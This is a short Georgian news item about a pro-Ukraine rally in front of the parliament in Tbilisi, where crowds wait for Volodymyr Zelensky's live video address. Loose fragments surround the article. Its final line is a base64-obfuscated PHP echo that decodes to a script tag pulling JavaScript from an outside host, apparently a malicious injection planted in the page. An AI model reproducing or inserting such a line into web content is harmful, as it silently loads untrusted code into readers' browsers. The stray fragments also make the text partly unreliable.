celsiusi
ავერსი შნაიდერი
საქართველოს პარლამენტთან უკრაინის მხარდამჭერი აქცია მიმდინარეობს. საკანონმდებლო შენობის წინ მონიტორები და ტექნიკაა დამონტაჟებული, საიდანაც რამდენიმე წუთში მოქალაქეებს უკრაინის პრეზიდენტი ვოლოდიმირ ზელენსკი პირდაპირ ეთერში მიმართავს.
 
აქციის მონაწილეებს მოტანილი აქვთ საქართველოს და უკრაინის დროშები. ისმის მხარდამჭერი შეძახილი - „დიდება უკრაინას!“.
 
ამასთან, შესრულდა საქართველოს და უკრაინის სახელმწიფო ჰიმნი.
 
ამ დროისთვის რუსთაველის გამზირზე საავტომობილო მოძრაობა გადაკეტილია.
 
შეგახსენებთ, დღეს, საქართველოს დროით 20:00 საათზე, უკრაინის პრეზიდენტი ვოლოდიმირ ზელენსკი პირდაპირ ეთერში მიმართავს მსოფლიოს 5 ქალაქს, მათ შორის, თბილისსაც. ტელეხიდის პარტნიორია ტელეკომპანია "ფორმულა".
747
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");